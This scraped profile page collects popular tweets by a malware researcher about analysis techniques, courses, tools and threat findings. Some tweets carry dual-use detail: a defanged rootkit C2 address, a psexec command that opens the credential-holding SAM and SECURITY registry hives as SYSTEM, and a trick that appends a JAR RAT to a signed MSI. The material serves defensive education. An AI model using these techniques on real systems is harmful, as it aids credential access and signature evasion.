Karsten Hahn
@struppigel
Followers
23,114
Following
722
Media
1,496
Statuses
8,912
MalwareAnalysisForHedgehogs, Principal Malware Researcher at GDATA, he/him 🦔🌈🏳️⚧️
Germany
Joined May 2014
Don't wanna be here?
Send us removal request.
Explore trending content on Musk Viewer
#PKAtelier24xZNN
• 191285 Tweets
PKAW 2024 x NuNew
• 114848 Tweets
PAINKILLER24 x ZeePruk
• 39155 Tweets
#オールスター感謝祭24秋
• 28270 Tweets
花火大会
• 27804 Tweets
PLUTO OFFICIAL TRAILER
• 21546 Tweets
ヒロアカ
• 20001 Tweets
WALK WITH ENHYPEN IN GOYANG
• 16134 Tweets
35Y KPWxPPV
• 15839 Tweets
ファーム日本一
• 13527 Tweets
#だらだらひとりポテナゲ最高
• 12152 Tweets
#يوم_المعلم
• 11983 Tweets
PEAT X PAINKILLER
• 11216 Tweets
トガちゃん
• 10342 Tweets
Pinned Tweet
My beginner's course for malware analysis is finally ready. 🎉🦔🦔🧫🧑🔬
Get access for free for the next 5 days by using the link below:
34
250
1K
COVID-19 map for Germany looks pretty bad.
Except for Ludwigslust-Parchim.
It was hit by ransomware.
43
544
2K
As a malware analyst I sometimes receive Microsoft files which have been manipulated.
E.g. infected by a virus and cleaned afterwards.
Here are some indicators to recognize PE file manipulation. 🧵
14
402
1K
Tips to stay safe while working with malware samples.
1. Use different OS on the host machine than your analysis VM
--> most malware will not be able to run there
8
145
625
RE Tip. If you want to decrypt obfuscated .NET strings, just call them from Powershell. E.g. this is xWorm config decryption.
File:
6
146
577
Good tip of my colleague:
This is how you can recognize 64 bit code wrongly interpreted as 32 bit code. It has lots of dec eax instructions because 0x48 is also used to signify 64 bit operand size.
(32 bit interpretation is first picture, 64 bit second)
6
117
434
Tfw you take a malware analysis course and give a bad rating because of malware files. o.O
18
41
426
I found this advertisment for a
#Ransomware
#Removal
Tool on Reddit this morning. Seems fishy? Let's take a look.
9
127
424
I made an info graphic about process injection. (I am not good at design though).
#processinjection
15
210
418
☢️Network filter rootkit that connects to this IP in China:
hxxp://110.42.4.180:2081/u
It does not look like Moriya (signature will be corrected asap)
File is signed by Microsoft.
#rootkit
#netfilter
12
130
347
How to analyse malicious MSI files
E.g. this Magniber MSI
It consists mostly of zeroes.
1. step: Unpack with 7zip. Among the unpacked files is a x64 DLL named "djrbwtwujn"
But how is this DLL called?
9
102
331
Ransomware simulators cannot test antivirus software.
(thread)🧵
11
79
319
Finally it is there: A GUI version of PortexAnalyzer🔎
PortexAnalyzer is a free PE parser tailored for malware analysis. It uses the library PortEx.
🔽Download:
#PortEx
#PortexAnalyzer
3
96
302
Dear PowerShell, it's always a pleasure to work with you. \s
Sample:
10
74
299
Ever wanted to check what's inside HKLM\SAM and HKLM\SECURITY?
You can run
> psexec -s -i -d regedit.exe
this will execute regedit as local system account
7
50
298
This is interesting!
⬆️Jar files are read bottom to top,
⬇️MSI files are read top to bottom.
Append a JAR RAT to a clean, signed MSI and you have a signed malware that will run as JAR with .jar extension.
Sigcheck.exe tells you about invalid size.
9
137
296
This video is an excellent introduction to PDF malware analysis
0
81
291
New article: Microsoft signed a malicious Netfilter rootkit
Thanks for your contributions
@jaydinbas
@cyb3rops
@cci_forensics
11
137
282
I wrote a detailed and technical article about ransomware identification for analysts. 😃
I put my 💙into this. Enjoy!
#GDataTechblog
#GData
#ransomware
7
138
281
Finding the right decompiler for Python bytecode can be a pain because there are so many.
I compiled this table to check the supported versions
7
80
276
I created a NightHawk String Decoder IDAPython Script.
It will add the decoded strings as comments to IDA.
2
94
274
Microsoft signed rootkit
#FuRootkit
🌳
Created and submitted in May, still only 4/10
\\Device\\Projector_Pro1_deviced
🧬
🕵️
7
91
256
APIs related to memory allocation. Those can be useful to put breakpoints for unpacking.
All of these end up at NtAllocateVirtualMemory, though.
4
58
248
I highly recommend this building your own OS series for learning reverse engineering.
1
53
241
#FF
Looking for good youtube channels to learn malware analysis?
Check out channels by
*
@herrcore
*
@cybercdh
*
@moveax41h
*
@hasherezade
6
94
204
Some tips on writing malware analysis reports.
➡️ have a list of sha256 hashes for analysed samples in one place that can be copied (no image)
➡️ if you include malware code, use an image instead of text, or AV will detect it
➡️ be concise, to the point, technically precise
...
2
48
205
IDA Pro + Intezer plugin + mkYara + Lumina = fast signature creation
3
61
205
Some arbitrary facts about malware detection names and detection rates on VT.
(thread)
3
101
203
I once made a process injection infographic for a workshop
3
65
182
The world is full of beginner's guides for everything.
We need more intermediate and expert knowledge for free.
12
19
191
Some people seem to think it is good idea to use sandboxes (like Sandboxie) for regular malware analysis.
Here are a few resources and quotes by Wojtczuk and Kashyap that illustrate why it is not. (Thread)
Also: Please use a VM instead!
7
80
178
Do you have recommendations for malware analysis and reversing blogs? Especially small ones.
Don't be shy to announce your own blog.
Please don't include Antivirus vendors.
49
72
182
Lots of malware is written by idiots who assume you have standard paths and drives for your system. So you see hardcoded paths assuming your OS is installed on drive C:
Install your OS on a different drive and you are safe from malware written by idiots.
5
41
182
Do you want to become my colleage?
My team is looking for malware analysts.
Fully remote is possible.
📑PDF with more info:
14
76
173
New Video: Deobfuscation of JScript malware like GootLoader using 3 methods 🦔
➡️ regex
➡️ AST manipulation
➡️ dynamic deobfuscation
#GootLoader
#MalwareAnalysisForHedgehogs
#AST
#JScript
2
72
178
I tried 4 affordable disassemblers/decompilers.
🐲✂️👩💻🥷
Ghidra, Cutter, IDA Free and Binary Ninja.
#MalwareAnalysisForHedgehogs
5
41
176
People often ask for easy malware samples to study malware analysis.
Here is a tip if you don't find any:
➡️ Just take any malware sample, e.g., from your email inbox)
➡️ Set a timer on 20 minutes
➡️ Find out as much as you can in that time frame, write it down.
2
50
172
If a malware analyst was a medical doctor: "I am not sure yet what it is. Let's infect others with your virus first and see what happens."
7
46
168
This week I went to an escape room at rätselraum ruhrpott and hid a ring in the last riddle.
Now I am an engaged to this wonderful man 🥰💍💙
38
1
166
New Video: APT Turla's Kopiluwak🦔📹
This is a suitable beginner sample for writing a C2 extractor with binary refinery or CyberChef
🔗 Chain: VBA ➡️ JS ➡️ JS
#MalwareAnalysisForHedgehogs
5
62
167
Detection technology research papers consistently misunderstand how much more impact a false positive has compared to false negatives.
They often get equal weight.
Sometimes false positives are even ignored.
11
49
171
I have spent way too much time on writing this
#GootLoader
JS unpacker and C2 extractor with abstract syntax tree manipulation. 🌳
But I could not stop at having it half done and this malware has 6 layers.
I am sorry for the terrible code.
8
50
163
3
67
156
I got accepted to researchgate and uploaded my thesis there.
Robust Static Analysis of Portable Executable Malware
12
25
151
Hunting malware is sometimes putting hours of work into samples just to find out that there is a comprehensive article about it from months ago.
7
11
155
Ever wanted to know how malware names are created and why they are such a mess?
I wrote an article about it.
#MalwareNames
#GDATATechblog
@GDATA
6
69
148
Today I stepped back from my lead engineer position to do again what I love the most: malware analysis.
I am now Principal Malware Researcher at GDATA.
13
0
150
A short clip on why I created a malware analysis course.
#MalwareAnalysisForHedgehogs
#MalwareCourse
0
40
144
Reddit user spreads malicious ISO via fake Avira website
🔗avira(dot)pw
🕵️♂️(6/54)
2
46
139
I am now a wheelchair user although I can walk.
I am very happy about that.
Here is why. (thread)
40
16
144
My team is looking for a Malware Analyst.
You should be living somewhere in Germany or willing to relocate.
Fully remote, office and hybrid are possible.
Use application form:
Or email: personal
@gdata
.de
EN description:
9
51
137
I am looking for malware and reversing blogs that I can add to my feed.
E.g. you just started publishing? Let me know.
Please no companies and no big news sites.
33
27
141
When did people start saying "detonate" as synonym for executing malware?
And why? It's not like malware explodes. Mostly it just runs boringly.
32
12
139
I highly recommend this Malware Analysis series. Very information dense, maybe not for bloody beginners, but everyone else should take a look.
The sixth article in the Malware Analysis Series (MAS) is available:
The C2 configuration extractor is slightly less trivial than expected.
Thank you
@ilfak
and
@HexRaysSA
for supporting and providing me with IDA Pro.
#malwareanalysis
#malware
20
305
792
3
38
138
New article: "The real reason why malware detection is hard—and underestimated"
If you think an AI with a 98% malware detection rate and 1% false positive rate is splendid, this might change your mind.
#GDATATechblog
@GDATA
4
56
133
Blog series about analysing Emotet:
1
50
134
5
62
136
CPython 3.9 and upwards has no support by decompilers yet (afaik).
But you can always analyse .pyc files by disassembling them. Python has its own module for that called dis.
This is how you do it, e.g., for a malwaremodule.pyc 👇
#Python
#reversing
8
43
132
#ZIPAnomaly
ZIP archive that delivers
#NanoCore
uses uses two "End of Central Directory" markers.
As a result compression tools behave differently when extracting. Some extract nothing, some only the first, some only the second file.
6
49
129
New Video: Finding Fresh Malware Samples (without a paid VT account) 🦔😀
#MalwareAnalysisForHedgehogs
2
80
132
New Blog Article: Interpreting Antivirus Detection Names.
#MalwareAnalysisForHedgehogs
🦔
Thanks to
@k_sec
and
@fwosar
for additional information that I added to this article.
@hexwaxwing
You wanted this. 🙂
6
52
127
🦔📹 New Video: Unpacking Methods overview and when to use them. 📦
➡️ Run and dump
➡️ Debugger and breakpoints
➡️ Self-extracting patch
➡️ Emulation
➡️ Static unpacking
#MalwareAnalysisForHedgehogs
#Unpacking
1
48
126
#YaraTip
for .NET
You can not only add IL code and method names, but also method signatures to your Yara rules.
Use the following command to print signature bytes for a method:
ildasm.exe /TEXT /BYTES /ITEM="::Baz" <path-to-file>
2
47
123
I cannot stress this enough (to beginners): Please use the most simple and effective tools first -- hex editor and strings tool (e.g. by SysInternals).
You will find the low hanging fruits there.
Btw IDA's strings view is **not** a replacement for a string tool.
11
14
122
Yara practices I highly recommend after having written ~1500 rules🧵
#100DaysOfYara
1. For code patterns: add the disassembled code as comment
Otherwise you force readers to reverse engineer the code pattern, making it hard to maintain, judge its usefulness and matches.
2
37
118
New Video: Oligomorphic, Polymorphic and Metamorphic Viruses. 🤯
Or to put it differently: Concepts and terminology of encrypted viruses and self-mutating viruses.
#MalwareAnalysisForHedgehogs
🦔
0
64
114
I could use your help. I have a student who wants to learn C with the purpose of learning malware analysis.
What resources do you recommend for C programming?
They have a solid IT background but almost no programming.
27
22
116
New Video: Kernel mode malware emulation with Speakeasy by Mandiant 🎥🦔🌽
#MalwareAnalysisForHedgehogs
#Speakeasy
#Kernelmode
#emulation
1
38
115
I wrote about the Malware Naming Hell. This is part 1: AV detection names
@GDataSoftwareAG
#GDATA
#GDATATechblog
#malwarenames
3
55
110
My book review for "Malware Analysis and Detection Engineering" 📖🦔
#MalwareAnalysisForHedgehogs
#BookReview
#MalwareBooks
5
27
109
New Video: Unpacking payload from AutoIt-based stub 🦔 📹
2 ways: fast guessing or thorough analysis
➡️ extracting AutoIt script
➡️ finding relevant code in large scripts
➡️ string decryption
➡️ quick shellcode analysis
#MalwareAnalysisForHedgehogs
1
42
109
Ghidra amazes me with easy string translation and scripting.
This time I wrote the NightHawk string decryption for Ghidra.
0
32
106
New video: Purchase Order.pdf.zpaq unpacking and deobfuscation🦔📹
ZPAQ ➡️ .wav download ➡️ .NET DLL injector ➡️ .NET payload
🛠️zpaq, DnSpy, IlSpy, binary refinery, PortexAnalyzer, HxD, SystemInformer
#MalwareAnalysisForHedgehogs
#ZPAQ
2
44
105
New Gozi variant hides in these registry keys followed by a counter as registry value
➡️HKCU\SOFTWARE\<username>\
➡️HKCU\SOFTWARE\<username>1\
RunPE injection into:
➡️Windows Photo Viewer\ImagingDevices.exe
5
41
104
Also useful functions for unpacking.
You can find the infographic on my page, they are under Creative Commons license (CC BY):
0
26
104
New Video: Hiding .NET IL Code with R2R Stomping 🦔🎥
➡️ creation of R2R stomped files
➡️ analysis of such files
➡️ same for singlefile executables
➡️ implications on AV detections
#MalwareAnalysisForHedgehogs
#R2RStomping
2
27
104
Awesome Ghidra setup video by
@CatWithoutAHat7
✔️Graph mode tweaks
✔️Dark theme
✔️IDA key bindings
2
37
102
Would you be interested in malware analysis book reviews for my upcoming videos?
17
2
97
1
99
101
#Malware101
#MalwareAnalysisForHedgehogs
Why does malware often use batch commands or files that ping 8.8.8.8 a few times and then delete an executable?
➡️ ping is used equivalent to a sleep() call here. It passes time before the next command is executed
8
21
101
Today I finished working through this book.
It is meant for .NET developers, but totally worth it for reverse engineering as well.
Do you have any book tips for me?
4
14
100
Malware tip of the day.
Sometimes samples are too big for analysis sandbox systems, VirusTotal etc.
Check if the sample is bloatet. You can do this easily with entropy visualization.
Most common case: Zero bytes appended to the file.
4
26
98
I wrote a short article about malware hiding in Steam profile images, which was first mentioned by
@miltinh0c
#SteamMalware
#SteamHide
#GDATATechblog
@GDATA
4
34
98
Some thoughts about maliciousness of joke malware, educational malware and other "gray" areas. (thread)
3
44
94
In case someone needs it: I made a shellcode to PE converter for win32 and 64
usage:
shellcode_to_pe.py win32 C:\shellcode_file
1
24
97
New Video: Unpack and Decompile Python-to-Exe Malware 🦔
Also Happy New Year to everyone! 🥂
#MalwareAnalysisForHedgehogs
0
56
91
New Video: In continuation of last week we deobfuscate the AgentTesla payload of the ZPAQ malware to obtain the config 🦔
Tools: Shed, DnSpy, SystemInformer, NetReactorSlayer
#MalwareAnalysisForHedgehogs
#NetReactor
#AgentTesla
3
32
96